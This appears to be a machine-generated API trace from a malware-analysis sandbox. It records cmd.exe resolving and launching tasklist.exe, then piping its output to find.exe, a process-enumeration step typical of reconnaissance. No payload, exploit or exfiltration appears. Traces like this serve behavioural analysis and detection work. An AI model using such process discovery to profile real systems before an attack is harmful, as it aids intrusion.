_wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0096.265] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0096.265] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0096.265] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0096.265] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0096.265] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0096.265] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0096.265] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0096.265] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0096.265] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0096.265] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0096.265] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0096.265] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0096.265] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0096.265] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0096.265] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0096.265] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0096.265] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0096.265] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0096.265] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0096.265] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0096.265] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0096.266] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0096.266] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0096.266] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0096.266] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0096.266] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0096.266] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0096.266] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0096.266] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0096.266] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0096.266] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0096.266] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0096.266] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0096.266] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0096.266] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0096.266] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0096.266] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0096.266] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0096.266] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0096.266] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0096.266] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0096.266] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0096.266] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0096.266] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0096.266] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0096.266] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0096.266] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0096.266] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0096.266] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0096.266] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0096.266] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0096.266] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0096.266] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0096.266] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0096.266] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0096.266] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0096.266] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0096.266] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0096.266] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0096.266] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0096.266] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0096.266] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0096.266] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0096.266] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0096.266] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0096.266] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0096.266] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0096.266] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0096.266] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0096.266] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0096.266] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0096.266] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0096.267] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0096.267] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0096.267] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0096.267] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0096.267] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0096.267] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0096.267] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0096.267] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0096.267] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0096.267] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0096.267] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0096.267] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0096.267] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0096.267] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0096.267] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0096.267] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0096.267] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0096.267] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0096.267] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0096.267] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0096.267] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0096.267] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0096.267] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0096.267] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0096.267] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0096.267] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0096.267] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0096.267] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0096.267] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0096.267] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0096.267] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0096.267] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0096.267] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0096.267] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0096.267] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0096.267] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0096.267] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0096.267] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0096.267] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0096.267] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0096.267] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0096.267] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0096.267] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0096.268] SetErrorMode (uMode=0x0) returned 0x0 [0096.268] SetErrorMode (uMode=0x1) returned 0x0 [0096.268] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x625228, lpFilePart=0x47fb4c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x47fb4c*="Desktop") returned 0x1c [0096.268] SetErrorMode (uMode=0x0) returned 0x1 [0096.268] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0096.268] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0096.272] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0096.272] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.272] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x47f8d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47f8d8) returned 0xffffffff [0096.272] GetLastError () returned 0x2 [0096.272] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.272] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x47f8d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47f8d8) returned 0x625530 [0096.273] FindClose (in: hFindFile=0x625530 | out: hFindFile=0x625530) returned 1 [0096.273] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x47f8d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47f8d8) returned 0xffffffff [0096.273] GetLastError () returned 0x2 [0096.273] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x47f8d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47f8d8) returned 0x625530 [0096.273] FindClose (in: hFindFile=0x625530 | out: hFindFile=0x625530) returned 1 [0096.273] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0096.273] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0096.273] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0096.273] SetErrorMode (uMode=0x0) returned 0x0 [0096.273] SetErrorMode (uMode=0x1) returned 0x0 [0096.273] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x62a3c0, lpFilePart=0x47f8f4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x47f8f4*="Desktop") returned 0x1c [0096.273] SetErrorMode (uMode=0x0) returned 0x1 [0096.273] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0096.273] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0096.273] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0096.273] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.274] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x47f680, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47f680) returned 0xffffffff [0096.274] GetLastError () returned 0x2 [0096.274] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.274] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x47f680, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47f680) returned 0x625628 [0096.274] FindClose (in: hFindFile=0x625628 | out: hFindFile=0x625628) returned 1 [0096.274] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x47f680, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47f680) returned 0xffffffff [0096.274] GetLastError () returned 0x2 [0096.274] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x47f680, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47f680) returned 0x625628 [0096.274] FindClose (in: hFindFile=0x625628 | out: hFindFile=0x625628) returned 1 [0096.274] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0096.274] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0096.274] GetConsoleTitleW (in: lpConsoleTitle=0x47fb7c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0096.274] InitializeProcThreadAttributeList (in: lpAttributeList=0x47faa8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x47fa8c | out: lpAttributeList=0x47faa8, lpSize=0x47fa8c) returned 1 [0096.274] UpdateProcThreadAttribute (in: lpAttributeList=0x47faa8, dwFlags=0x0, Attribute=0x60001, lpValue=0x47fa94, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x47faa8, lpPreviousValue=0x0) returned 1 [0096.274] GetStartupInfoW (in: lpStartupInfo=0x47fae0 | out: lpStartupInfo=0x47fae0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2a0, hStdError=0x2c)) [0096.274] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0096.274] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0096.275] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0096.275] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0096.276] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x47fa30*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x47fa7c | out: lpCommandLine="tasklist", lpProcessInformation=0x47fa7c*(hProcess=0x64, hThread=0x60, dwProcessId=0x870, dwThreadId=0x880)) returned 1 [0096.279] CloseHandle (hObject=0x60) returned 1 [0096.279] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0096.279] GetEnvironmentStringsW () returned 0x6242d8* [0096.279] FreeEnvironmentStringsA (penv="=") returned 1 [0096.280] DeleteProcThreadAttributeList (in: lpAttributeList=0x47faa8 | out: lpAttributeList=0x47faa8) [0096.280] _get_osfhandle (_FileHandle=3) returned 0x54 [0096.280] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0096.280] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0096.280] _close (_FileHandle=5) returned 0 [0096.280] _dup (_FileHandle=0) returned 4 [0096.280] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0096.280] _close (_FileHandle=3) returned 0 [0096.280] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0096.280] SetErrorMode (uMode=0x0) returned 0x0 [0096.280] SetErrorMode (uMode=0x1) returned 0x0 [0096.280] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6242e0, lpFilePart=0x47fb4c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x47fb4c*="Desktop") returned 0x1c [0096.280] SetErrorMode (uMode=0x0) returned 0x1 [0096.280] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0096.280] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0096.280] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0096.280] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.280] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x47f8d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47f8d8) returned 0xffffffff [0096.280] GetLastError () returned 0x2 [0096.280] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.281] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x47f8d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47f8d8) returned 0x625628 [0096.281] FindClose (in: hFindFile=0x625628 | out: hFindFile=0x625628) returned 1 [0096.281] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x47f8d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47f8d8) returned 0xffffffff [0096.281] GetLastError () returned 0x2 [0096.281] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x47f8d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47f8d8) returned 0x625628 [0096.281] FindClose (in: hFindFile=0x625628 | out: hFindFile=0x625628) returned 1 [0096.281] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0096.281] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0096.281] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0096.281] SetErrorMode (uMode=0x0) returned 0x0 [0096.281] SetErrorMode (uMode=0x1) returned 0x0 [0096.281] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x624668, lpFilePart=0x47f8f4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x47f8f4*="Desktop") returned 0x1c [0096.281] SetErrorMode (uMode=0x0) returned 0x1 [0096.281] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0096.281] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0096.281] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0096.281] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.282] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x47f680, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47f680) returned 0xffffffff [0096.282] GetLastError () returned 0x2 [0096.282] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.282] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x47f680, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47f680) returned 0x6204a0 [0096.282] FindClose (in: hFindFile=0x6204a0 | out: hFindFile=0x6204a0) returned 1 [0096.282] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x47f680, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47f680) returned 0xffffffff [0096.282] GetLastError () returned 0x2 [0096.282] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x47f680, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47f680) returned 0x6204a0 [0096.282] FindClose (in: hFindFile=0x6204a0 | out: hFindFile=0x6204a0) returned 1 [0096.282] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0096.282] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0096.282] GetConsoleTitleW (in: lpConsoleTitle=0x47fb7c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0096.282] InitializeProcThreadAttributeList (in: lpAttributeList=0x47faa8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x47fa8c | out: lpAttributeList=0x47faa8, lpSize=0x47fa8c) returned 1 [0096.283] UpdateProcThreadAttribute (in: lpAttributeList=0x47faa8, dwFlags=0x0, Attribute=0x60001, lpValue=0x47fa94, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x47faa8, lpPreviousValue=0x0) returned 1 [0096.283] GetStartupInfoW (in: lpStartupInfo=0x47fae0 | out: lpStartupInfo=0x47fae0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2a0, hStdError=0x2c)) [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 